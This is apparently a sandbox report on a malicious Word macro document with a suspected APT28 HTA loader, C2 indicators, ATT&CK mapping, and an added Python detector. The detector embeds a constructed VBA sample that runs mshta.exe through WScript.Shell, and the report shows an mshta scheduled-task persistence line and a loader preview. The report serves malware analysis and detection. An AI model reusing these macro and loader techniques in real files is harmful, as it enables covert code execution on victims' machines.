Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

Source: VBA code instrumentation  OLE, VBA macro: Module ThisDocument, Function rundoc, API Open("C:\Users\user\AppData\Local\Temp\Rev5_ Joint Declaration C5 GER_track changes.doc.doc")  Name: rundoc
Source: Rev5_ Joint Declaration C5 GER_track changes.doc  Stream path 'VBA/ThisDocument': found possibly 'ActiveDocument.Name' functions activedocument.name
Source: VBA code instrumentation  OLE, VBA macro: Module ThisDocument, Function documeNt_opEn, found possibly 'ActiveDocument.Name' functions activedocument.name  Name: documeNt_opEn
Source: ~WRD0000.tmp.0.dr  Stream path 'VBA/ThisDocument': found possibly 'ActiveDocument.Name' functions activedocument.name
Source: mshta.exe, 00000009.00000002.2965006340.0000023083C20000.00000004.00000020.00020000.00000000.sdmp  Binary or memory string: Hyper-V RAW =
Source: mshta.exe, 00000009.00000002.2965006340.0000023083C80000.00000004.00000020.00020000.00000000.sdmp  Binary or memory string: Hyper-V RAWf
Source: mshta.exe, 00000009.00000002.2965006340.0000023083C37000.00000004.00000020.00020000.00000000.sdmp  Binary or memory string: Hyper-V RAWen-USn
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE  Process information queried: ProcessInformation
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE  Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

The first four entries are the basis for the "accesses itself as a binary file" and "reads its own file name" signatures in the summary: the Document_Open handler is spelled documeNt_opEn (VBA identifiers are case-insensitive, so Word still runs it on open, while naive case-sensitive string matching misses it) and references ActiveDocument.Name, and the function rundoc opens the document's own Temp copy as a raw file, which is consistent with extracting an embedded payload from the document's own bytes rather than from a separate dropped file. The same macro is present in ~WRD0000.tmp, Word's working copy of the document, which is why that dropped file is flagged too. The Hyper-V strings in mshta.exe memory and the read of MachineGuid are consistent with virtual-machine detection and host fingerprinting, though MachineGuid is also read by many legitimate components, so neither is conclusive alone.
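The following Python is an added example, not code from the Joe Sandbox report and not the sample's macro, which the page does not reproduce. It scans extracted VBA source (the text an extractor such as olevba prints) for the indicators this section reports: an auto-executing handler in any letter case, a reference to ActiveDocument.Name, an Open ... For Binary self-read, base64-looking strings, and a WSH or mshta launch. The indicator names, the regular expressions, the triage() helper and the embedded SAMPLE_VBA text are all this example's own; SAMPLE_VBA is constructed to exercise the checks and is not the real macro.

```python
"""Added example: scan extracted VBA source for the evasion indicators this
report lists. Not code from the Joe Sandbox report or from the sample.

Assumptions (all this example's own): the indicator names, the regexes, the
triage() helper, and SAMPLE_VBA, which is CONSTRUCTED to exercise the checks
and is not the sample's real macro. Feed scan_vba()/triage() the text that a
VBA extractor such as olevba prints for a real file.
"""
from __future__ import annotations

import base64
import binascii
import re
from dataclasses import dataclass

# VBA identifiers are case-insensitive, so Word still fires a handler spelled
# "documeNt_opEn"; every pattern here therefore uses re.I.
INDICATORS = {
    "auto-exec on open/close": re.compile(
        r"\b(Document_Open|Document_Close|AutoOpen|AutoClose|AutoExec)\b", re.I),
    "reads own file name": re.compile(
        r"\bActiveDocument\.(Name|FullName|Path)\b", re.I),
    "opens a file as binary": re.compile(
        r"\bOpen\b[^\n]*\bFor\s+Binary\b", re.I),
    "base64-like string": re.compile(r"[A-Za-z0-9+/]{40,}={0,2}"),
    "WSH / LOLBin launch": re.compile(
        r"\b(WScript\.Shell|Shell\s*\(|mshta|CreateObject)", re.I),
}


@dataclass
class Finding:
    indicator: str
    line_no: int
    text: str


def scan_vba(source: str) -> list[Finding]:
    """One Finding per (line, indicator) pair that matches."""
    findings: list[Finding] = []
    for line_no, line in enumerate(source.splitlines(), start=1):
        for name, rx in INDICATORS.items():
            if rx.search(line):
                findings.append(Finding(name, line_no, line.strip()))
    return findings


def reads_itself_as_binary(findings: list[Finding]) -> bool:
    """The report's 'accesses itself as a binary file' pattern: the macro
    resolves its own document name AND opens a file in binary mode."""
    seen = {f.indicator for f in findings}
    return "reads own file name" in seen and "opens a file as binary" in seen


def decode_base64_candidates(source: str) -> list[str]:
    """Decode base64-looking runs; keep only those that yield printable ASCII."""
    out: list[str] = []
    for m in INDICATORS["base64-like string"].finditer(source):
        try:
            text = base64.b64decode(m.group(0), validate=True).decode("ascii")
        except (binascii.Error, UnicodeDecodeError):
            continue  # wrong padding, non-alphabet chars, or binary output
        if text.isprintable():
            out.append(text)
    return out


def triage(source: str) -> dict:
    """Summary a triage analyst can act on, built from the raw findings."""
    findings = scan_vba(source)
    return {
        "indicators": sorted({f.indicator for f in findings}),
        "self_read_as_binary": reads_itself_as_binary(findings),
        "decoded_strings": decode_base64_candidates(source),
        "findings": findings,
    }


# Constructed macro text mimicking the reported indicators; not the sample's code.
SAMPLE_VBA = r'''
Private Sub documeNt_opEn()
    rundoc
End Sub

Function rundoc()
    Dim buf() As Byte
    Dim p As String
    ' Read the running document back as raw bytes (self-read).
    p = ActiveDocument.Path & "\" & ActiveDocument.Name
    Open p For Binary Access Read As #1
    ReDim buf(LOF(1) - 1)
    Get #1, , buf
    Close #1
    ' Placeholder encoded string; the report only says base64 strings are present.
    payload = "QUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVowMTIzNDU2Nzg5"
    CreateObject("WScript.Shell").Run "mshta.exe " & Environ("TEMP") & "\x.hta", 0
End Function
'''

if __name__ == "__main__":
    result = triage(SAMPLE_VBA)
    for f in result["findings"]:
        print(f"line {f.line_no:>3}  {f.indicator:<25} {f.text}")
    print("self-read as binary:", result["self_read_as_binary"])
    print("decoded strings:", result["decoded_strings"])
```

The case-insensitive matching is the point of the exercise: a rule written for the literal string "Document_Open" would not have flagged this sample's handler. The base64 decoder keeps only candidates that decode to printable text, so hashes and long identifiers that happen to use the base64 alphabet are dropped instead of reported as false positives.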
MITRE ATT&CK matrix, listed per tactic (a leading number is the count of matching signatures in this analysis; techniques without a number had no match):

Reconnaissance: Gather Victim Identity Information | Credentials | Email Addresses | Employee Names
Resource Development: 42 Scripting | Domains | DNS Server | Virtual Private Server
Initial Access: Valid Accounts | Default Accounts | Domain Accounts | Local Accounts
Execution: 3 Exploitation for Client Execution | Scheduled Task/Job | At | Cron
Persistence: 42 Scripting | 1 DLL Side-Loading | Logon Script (Windows) | Login Hook
Privilege Escalation: 1 Process Injection | 1 DLL Side-Loading | Logon Script (Windows) | Login Hook
Defense Evasion: 1 Masquerading | 1 Process Injection | 1 DLL Side-Loading | Binary Padding
Credential Access: OS Credential Dumping | LSASS Memory | Security Account Manager | NTDS
Discovery: 11 Security Software Discovery | 1 Process Discovery | 1 File and Directory Discovery | 4 System Information Discovery
Lateral Movement: Remote Services | Remote Desktop Protocol | SMB/Windows Admin Shares | Distributed Component Object Model
Collection: 1 Email Collection | Data from Removable Media | Data from Network Shared Drive | Input Capture
Command and Control: 2 Encrypted Channel | 1 Ingress Tool Transfer | 2 Non-Application Layer Protocol | 3 Application Layer Protocol
Exfiltration: Exfiltration Over Other Network Medium | Exfiltration Over Bluetooth | Automated Exfiltration | Traffic Duplication
Impact: Abuse Accessibility Features | Network Denial of Service | Data Encrypted for Impact | Data Destruction
Source | Detection | Scanner | Label
Rev5_ Joint Declaration C5 GER_track changes.doc | 34% | ReversingLabs | Script-WScript.Trojan.MacrosBomber
Rev5_ Joint Declaration C5 GER_track changes.doc | 43% | Virustotal |
Rev5_ Joint Declaration C5 GER_track changes.doc | 100% | Avira | VBA/AVI.Obfuscated.hgyul

Source | Detection | Scanner
C:\Users\user\Desktop\~WRD0000.tmp | 100% | Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\~WRD0001.tmp | 100% | Joe Sandbox ML

No Antivirus matches
No Antivirus matches
Name | IP | Active | Malicious | Antivirus Detection | Reputation
background-services.net | 2.58.15.158 | true | true | | unknown
edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | 217.20.57.18 | true | false | | high
171.39.242.20.in-addr.arpa | unknown | unknown | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
2.58.15.158 | background-services.net | Czech Republic | 33438 | HIGHWINDS2US | true

Private IP
192.168.2.26
Joe Sandbox version: 42.0.0 Malachite
Analysis ID: 1590268
Start date and time: 2025-01-13 21:32:10 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 5m 37s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 11 23H2 with Office Professional Plus 2021, Chrome 131, Firefox 133, Adobe Reader DC 24, Java 8 Update 431, 7zip 24.09
Run name: Potential for more IOCs and behavior
Number of analysed new started processes analysed: 21
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• GSI enabled (VBA)
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Rev5_ Joint Declaration C5 GER_track changes.doc
Detection: MAL
Classification: mal92.expl.evad.winDOC@5/14@2/2
EGA Information: Failed
                        HCA Information:
                        • Successful, ratio: 100%
                        • Number of executed functions: 0
                        • Number of non-executed functions: 0
                        Cookbook Comments:
                        • Found application associated with file extension: .doc
                        • Found Word or Excel or PowerPoint or XPS Viewer
                        • Attach to Office via COM
                        • Scroll down
                        • Close Viewer
                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, SecurityHealthHost.exe, dllhost.exe, RuntimeBroker.exe, ShellExperienceHost.exe, WMIADAP.exe, SIHClient.exe, appidcertstorecheck.exe, conhost.exe, svchost.exe
                        • Excluded IPs from analysis (whitelisted): 217.20.57.18, 52.109.76.240, 52.109.76.144, 52.113.194.132, 95.100.110.74, 95.100.110.77, 20.189.173.2, 184.28.64.47, 2.20.245.216, 2.20.245.225, 52.109.89.19, 20.42.65.90, 52.109.32.47, 52.109.32.39, 52.109.32.46, 52.109.32.38, 20.109.210.53, 40.126.32.134, 20.242.39.171, 4.245.163.56, 40.126.32.140
                        • Excluded domains from analysis (whitelisted): e1324.dscd.akamaiedge.net, neu-azsc-000.odc.officeapps.live.com, odc.officeapps.live.com, slscr.update.microsoft.com, europe.odcsm1.live.com.akadns.net, templatesmetadata.office.net.edgekey.net, weu-azsc-000.roaming.officeapps.live.com, onedscolprdeus14.eastus.cloudapp.azure.com, eur.roaming1.live.com.akadns.net, mobile.events.data.microsoft.com, ecs-office.s-0005.s-msedge.net, roaming.officeapps.live.com, osiprod-weu-buff-azsc-000.westeurope.cloudapp.azure.com, login.live.com, officeclient.microsoft.com, templatesmetadata.office.net, wu-b-net.trafficmanager.net, res-1-tls.cdn.office.net, osiprod-neu-bronze-azsc-000.northeurope.cloudapp.azure.com, ecs.office.com, e40491.dscg.akamaiedge.net, client.wns.windows.com, ctldl.windowsupdate.com.delivery.microsoft.com, prod.configsvc1.live.com.akadns.net, uci.cdn.office.net, ctldl.windowsupdate.com, prod.roaming1.live.com.akadns.net, s-0005-office.config.skype.com, fe3cr.delivery.mp.microsoft.com, prod1.naturallanguageedi
• Not all processes were analyzed; the report is missing behavior information
                        • Report size exceeded maximum capacity and may have missing behavior information.
                        • Report size getting too big, too many NtCreateFile calls found.
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                        • Report size getting too big, too many NtQueryAttributesFile calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.
                        • Report size getting too big, too many NtReadVirtualMemory calls found.
                        • Report size getting too big, too many NtSetValueKey calls found.
Time | Type | Description
15:33:50 | API Interceptor | 861x Sleep call for process: mshta.exe modified
21:33:48 | Task Scheduler | Run new task: ServiceDispatch path: C:\Windows\System32\mshta.exe s>C:\Users\user\AppData\Local\Settings\locale
                        Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                        File Type:data
                        Category:dropped
                        Size (bytes):3402
                        Entropy (8bit):5.599930323764607
                        Encrypted:false
                        SSDEEP:48:dwm4wQ97qgOtXFYQqHyyzpE3bM0B04SAmRE7SahsOpjRCZ7/M67Sg1I0qC:WwQ9E2QE43YINF3psOl8Z/5P1I0qC
                        MD5:88F2752BD67FA632DF940B52E38254BD
                        SHA1:5E671630EACC842379EF09DCF57571E4CEED9574
                        SHA-256:3EB696345C147D924A0407E37143C44E8BE3563EFA23EEC914E6C9ACEE3F2BEB
                        SHA-512:7DDEBC720824F03E7693EFF42E7D1FED5C2FF6DC28F9A39E87123A56474649C1E9FE07FF2FCC1CEC10614546BD2EFC3A725D3A086100B0D451F6D0078E344EF2
                        Malicious:false
                        Yara Hits:
                        • Rule: apt_susp_apt28_uac0063_hta_loader, Description: Detects some suspected APT28 HTA loader, Source: C:\Users\user\AppData\Local\Settings\locale, Author: Sekoia.io
                        Reputation:low
Preview: <HEAD><HTA:APPLICATION ID="setuptools" APPLICATIONNAME="setuptools" WINDOWSTATE="minimize" MAXIMIZEBUTTON="no" MINIMIZEBUTTON="no" CAPTION="no" SHOWINTASKBAR="no" BORDER="none" SINGLEINSTANCE="yes"></HEAD><span id=codeblock>load</span><script Language="VBScript.Encode" defer> ...
                        Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                        File Type:data
                        Category:dropped
                        Size (bytes):828
                        Entropy (8bit):2.723114510712629
                        Encrypted:false
                        SSDEEP:24:BrIZMjr0quyFLdpeXKzz7tyYyPjJxpu620:9VjYqugdpeXRYyPjJxpu65
                        MD5:9149D59AC34E3FDF0EC8DC94EB76EDAB
                        SHA1:2BBF45FE0E79A9EDF738C99BCA893E87BD0883CE
                        SHA-256:DA1E9E1A7900C46DEDE8D82BFDF0FB2677890C9E5AB272F1DE5270D7077EEA78
                        SHA-512:C9548C9FE0B74613E9B99033937D68E4D9AC46806C24B1ED5C02A2529E2B2AE5CFE85752E6AB86899088CC0972A092E98A82EB5AE4D30AD39B5E452EF7CE637A
                        Malicious:false
                        Reputation:low
                        Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                        File Type:data
                        Category:dropped
                        Size (bytes):1908
                        Entropy (8bit):2.697596521086675
                        Encrypted:false
                        SSDEEP:48:m8/WKGjoLsidpeXy4McM+/kE5Ko5ARgpOiIgkyTzN:bQidmHbkGoRKt
                        MD5:84A61ED115B36B2E1BC0AACA8528F900
                        SHA1:C2CD2D1497C1A9EBB77BA0AA1B775615C6398034
                        SHA-256:03996C1827D46354E7E9F68CAA069F61C859E50D715951D95A40E0408D4A3BFE
                        SHA-512:1CC55E58A18111AD9E9B2AEE93A06AE6F6D7C3B120FED142B157EA08BF27B5E9A20A39EC5B8927C0C375162995BE3C0522C8FBD7B15167E130F60E1C20100343
                        Malicious:false
                        Reputation:low
                        Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                        File Type:Microsoft Word 2007+
                        Category:dropped
                        Size (bytes):22282
                        Entropy (8bit):7.5936605339775936
                        Encrypted:false
                        SSDEEP:384:/iYDt8HMzXvFx1GSNxt/ZtNNjF39fTaK4D+nfS7isXM9Q4kvaQvGaQad:/NG89x1txllNjFNX4D6SY92HtL
                        MD5:64F9FC5C386C100FC6BFAFB4EA6391ED
                        SHA1:A1E313C4CAF8EC5969EA707D9FA359270320BD7E
                        SHA-256:1C040D539F41F088B0E1E8B2B9582D0D3677FD2C65455568D133C55684D3B231
                        SHA-512:AF96D6FCA0A2B4DB69872E8DC45CDBA90620D0B39F6624D7561CEC593B8489461B20AF3F8C582EE9CE9F9DCC88BCAEEF078FBEF60041AC66AA0FBFE16C1B5472
                        Malicious:true
                        Reputation:low
                        Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                        File Type:GIF image data, version 89a, 15 x 15
                        Category:dropped
                        Size (bytes):663
                        Entropy (8bit):5.949125862393289
                        Encrypted:false
                        SSDEEP:12:PlrojAxh4bxdtT/CS3wkxWHMGBJg8E8gKVYQezuYEecp:trPsTTaWKbBCgVqSF
                        MD5:ED3C1C40B68BA4F40DB15529D5443DEC
                        SHA1:831AF99BB64A04617E0A42EA898756F9E0E0BCCA
                        SHA-256:039FE79B74E6D3D561E32D4AF570E6CA70DB6BB3718395BE2BF278B9E601279A
                        SHA-512:C7B765B9AFBB9810B6674DBC5C5064ED96A2682E78D5DFFAB384D81EDBC77D01E0004F230D4207F2B7D89CEE9008D79D5FBADC5CB486DA4BC43293B7AA878041
                        Malicious:false
                        Reputation:high, very likely benign file
                        Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                        File Type:data
                        Category:dropped
                        Size (bytes):1127211
                        Entropy (8bit):5.812814119457844
                        Encrypted:false
                        SSDEEP:24576:y/T48adNSu65QT+wkOA21Pa601IURbx6uhdYwjERkwhgizvU72DV:yb486Su6rwkOA21Pa601IYx6UEGiFh
                        MD5:5F6A325EFF287D11AEB18114C9D7E973
